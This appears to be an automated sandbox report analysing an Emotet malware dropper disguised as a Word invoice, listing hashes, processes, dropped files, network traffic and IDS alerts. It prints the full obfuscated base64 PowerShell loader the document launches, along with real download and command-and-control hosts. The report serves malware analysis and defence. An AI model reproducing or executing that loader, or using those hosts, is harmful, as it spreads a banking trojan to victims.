File name: | Invoice_7765131.doc |
Full analysis: | https://app.any.run/tasks/2f70ff00-aeeb-4b32-b651-da6ed280a2d7 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 14, 2019, 17:30:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 14:54:00 2019, Last Saved Time/Date: Thu Mar 14 14:54:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 0EEE1B3D23B11F22AC43E35DCFC4F2BF |
SHA1: | 6721745F8379BAF723C17DF97A5BEF71D14426B0 |
SHA256: | F5B0AC70E785424496EADC9329962B5B6FB37C67955B9895F4D186AC9C26B868 |
SSDEEP: | 6144:w77HUUUUUUUUUUUUUUUUUUUT52V99/4kgg0q3u5ukNN069UYGe:w77HUUUUUUUUUUUUUUUUUUUTC99gkggC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 3 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 3 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:03:14 14:54:00 |
CreateDate: | 2019:03:14 14:54:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3356 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_7765131.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3256 | powershell -e IABpAGUAeAAoAG4AZQBXAC0ATwBCAEoAZQBjAFQAIAAgAFMAeQBTAFQARQBNAC4AaQBvAC4AYwBPAE0AUABSAGUAcwBTAEkAbwBOAC4AZABlAEYATABhAHQAZQBzAHQAUgBFAEEATQAoACAAWwBpAG8ALgBNAGUATQBPAHIAWQBTAFQAcgBFAGEAbQBdACAAWwBTAHkAcwB0AGUATQAuAEMATwBuAFYARQBSAHQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAHQAUgBpAE4AZwAoACAAKAAnAFYAZABKACcAKwAnAGQAaQAnACsAJwA2AE0AdwBGAEEAYgBnAHYAKwAnACsAJwBLAEYAJwArACcAawBKACcAKwAnAFoAdQAnACsAJwBUAGIAdQAnACsAJwA0ADcAJwArACcATQB5AEkATQBLAGUAJwArACcAMQA2ACcAKwAnAC8AJwArACcAWgBpAEIAJwArACcAbQBUAHAAJwArACcAegBnAGMATABvAHYARwAwAFoAJwArACcAdABSAEUAJwArACcATgBEAGEAJwArACcAMQAnACsAJwBwAGYAJwArACcAOQA5AEkAJwArACcAMAB5AEYAOAAnACsAJwBTAG8AYwAnACsAJwBuAGgAegBmAG4ATQBUACcAKwAnAGUAJwArACcAQQBMAHkAQwA5AE0AbQA1AGcAJwArACcARgBEAHYAWABPAEwAWgAyACcAKwAnADEAZQBJACcAKwAnAEkAZgBRACcAKwAnAEYAJwArACcANgByAGwATQBQACcAKwAnADUAQQBwADYAeABtAFYAOAA0AEwAcAAnACsAJwB1AHUAJwArACcAUQBvAGwARwBjACcAKwAnAEQAYQBDAGkAaQBsACcAKwAnAFUAOQB5AHAAZQByADIAJwArACcAZwBWAEsAdAAnACsAJwB0AGQATQBuACcAKwAnADQAbwBNACcAKwAnAG4AOABwAHcAbgB3AG0ARwAnACsAJwB5AG8AJwArACcAcgBxAGUAJwArACcAYwA4AEgASwBMAHMATwAnACsAJwBXADcAaABlAE0AJwArACcAUABnACcAKwAnADcAWQAyAE8ANgBNACcAKwAnAFAAJwArACcAVwA5AHEANwBBADkAJwArACcASgBsAFcAJwArACcASgB6AHMAMABsAFcAYwBVAEgARgBiACcAKwAnADMAJwArACcAZQBFAEkAagAnACsAJwBtAGkANQBpAEoAcgAnACsAJwAwACcAKwAnAEQAbgAxAFoAMgBPACsARAA0ADUAJwArACcASgBvAFUAdwAnACsAJwBJAFcAcQBpACcAKwAnAC8ATAA5ACcAKwAnAEgAZABpACcAKwAnAE4AdQB1AHgAJwArACcAcQAnACsAJwBaAGwAdQBaAFIAbAAnACsAJwBxACcAKwAnADYAJwArACcAVABaAE0AcgAnACsAJwBTACcAKwAnAFYAWgBVAFoARgB0ACcAKwAnADcAbwBmAEYAJwArACcAVwAnACsAJwA5ADYAawBUAGcAcABIACcAKwAnADcAJwArACcAcgBSACcAKwAnAG4ANQB1ACcAKwAnADcAJwArACcAdwAnACsAJwB4AE0AJwArACcAbAB6ACcAKwAnAHAAKwAnACsAJwA2ACcAKwAnADUAJwArACcARwBwAEMASABzAG4AVQBzAHoAJwArACcAbgBBAEwAZwBBACcAKwAnAEEAJwArACcAbgAyAGcASgA0AFIASgAnACsAJwBrAFkATwBhACcAKwAnAHgAMABRAFcATABUACcAKwAnAGQASAAnACsAJwB5AEwAJwArACcAZgBKAGoAYwBXADgAJwArACcAcQAvAEIAMQBnAHUAVAAnACsAJwBSACcAKwAnAG8AdwBFAFYAawBLACcAKwAnAHMALwAnACsAJwBNAHIAJwArACcASgBhACsAagBlACcAKwAnAEwANAAnACsAJwAwAEwAJwArACcAWABZADEAJwArACcASQAnACsAJwAzACcAKwAnAGMAOAAnACsAJwB4AEoAJwArACcAbgAnACsAJwA1ACcAKwAnAEIAJwArACcAKwBaAGoAUQAnACsAJwAxAG0AeABNACcAKwAnAEUAVABFAG0AOQB2AEEAaQBZAHMAbgAnACsAJwA5AGgAMQB2AEYAdQB0ACcAKwAnAFkAJwArACcANAAnACsAJwBzAEwAJwArACcANgB6AGIAVAAnACsAJwA2AFUAVQAxAC8AZQAnACsAJwBYAHoAQwAnACsAJwBwAHgAQQAnACsAJwBhAGwASABLAEoAUAB0AGwAJwArACcAVwB0ADMAMABOACsAdgB6AFoAeQBaACcAKwAnAHUAeABSAGgARQBFACcAKwAnAFAAJwArACcAdgBrAFQAJwArACcAVQAnACsAJwBJAEEAJwArACcASgB1AHQAMgAnACsAJwBiACcAKwAnADAAMAAnACsAJwBtAEkAYQByADUAVgBtAEUAJwArACcAMQBRAHEAJwArACcAZABFAGMAVgBDADUAJwArACcATgAnACsAJwBUACsAJwArACcAZwA1ACcAKwAnAFMANwAnACsAJwBNAE4ANwAnACsAJwBVAHUAVwAzAEcAVQBCACcAKwAnAFgAJwArACcANQB4AG4AbQAnACsAJwAzACcAKwAnAGUAJwArACcAZwBJAFEAJwArACcAbwBOAE0AJwArACcAZgBuACcAKwAnAGIAaAAnACsAJwB5ADkAcgA0AG0AJwArACcAWABtAHEAUwBGACcAKwAnAGQAJwArACcANwAyACcAKwAnAHkAUgBMACcAKwAnAEgAJwArACcAOABjACcAKwAnAHIAJwArACcAMwBhADYAYwBtAFEAJwArACcAWQAnACsAJwBVAEIAVgA0ACcAKwAnAEEAWQBtAGMAVQBHADgALwAnACsAJwB3AD0APQAnACkAKQAgACwAIABbAGkAbwAuAGMATwBtAHAAUgBlAHMAcwBJAG8AbgAuAEMAbwBtAHAAcgBFAFMAUwBpAG8ATgBtAE8AZABFAF0AOgA6AGQAZQBjAG8ATQBwAFIARQBTAFMAKQB8ACAAZgBvAHIAZQBhAEMAaAAgAHsAIABuAGUAVwAtAE8AQgBKAGUAYwBUACAAIABJAE8ALgBzAFQAUgBlAEEAbQByAGUAYQBkAGUAUgAoACAAJABfACwAIABbAHMAWQBTAHQARQBNAC4AdABFAFgAVAAuAGUAbgBDAE8AZABpAG4AZwBdADoAOgBBAFMAQwBpAGkAKQB9AHwAZgBPAFIAZQBBAGMAaAAgAHsAIAAkAF8ALgByAEUAYQBkAFQAbwBFAG4ARAAoACAAKQAgAH0AKQAgAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1240 | "C:\Users\admin\509.exe" | C:\Users\admin\509.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® HTML Help Executable Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
300 | "C:\Users\admin\509.exe" | C:\Users\admin\509.exe | 509.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® HTML Help Executable Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2852 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 509.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® HTML Help Executable Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3572 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® HTML Help Executable Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDD51.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D3MJ2BUGAZ4K19K7IM31.temp | — | |
MD5:— | SHA256:— | |||
3356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF3B2807D214108E3.TMP | — | |
MD5:— | SHA256:— | |||
3356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EE8E8866-6447-4F77-9BB8-6D770569CD9E}.tmp | — | |
MD5:— | SHA256:— | |||
3356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F7F83573-3618-4068-BF4F-A58FE3316038}.tmp | — | |
MD5:— | SHA256:— | |||
3356 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6FD18234DDBB23A0012311444A9FABA1 | SHA256:695AB9750FFBDA0E108233C4275FF6CDF75DC10F78871B1FC329972A0F7C120F | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ae65a.TMP | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
3256 | powershell.exe | C:\Users\admin\509.exe | executable | |
MD5:2D0CF1F28904B3470FD36EF5E77527AE | SHA256:D6CB78314786E68D8044D7EEE3FC9E24877EF668CC2BB343F6B3DC76E1C855E7 | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
3356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$voice_7765131.doc | pgc | |
MD5:890A8990F4A4F8DE5B504BD604AAF72C | SHA256:29AF42AAE914738EEAB9104D211C0B46D11B762C4DD96176B64B9216FBFA7A57 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3572 | wabmetagen.exe | GET | 200 | 82.78.228.57:443 | http://82.78.228.57:443/ | RO | binary | 132 b | malicious |
3256 | powershell.exe | GET | 200 | 178.210.177.101:80 | http://uzeyirpeygamber.com/wp-admin/nH4/ | TR | executable | 182 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3256 | powershell.exe | 47.94.209.126:443 | www.yanjiaozhan.com | Hangzhou Alibaba Advertising Co.,Ltd. | CN | unknown |
3572 | wabmetagen.exe | 82.78.228.57:443 | — | RCS & RDS | RO | malicious |
3256 | powershell.exe | 178.210.177.101:80 | uzeyirpeygamber.com | Equinix Turkey Internet Hizmetleri Anonim Sirketi | TR | suspicious |
Domain | IP | Reputation |
---|---|---|
www.yanjiaozhan.com |
| unknown |
uzeyirpeygamber.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3256 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3256 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3256 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3572 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |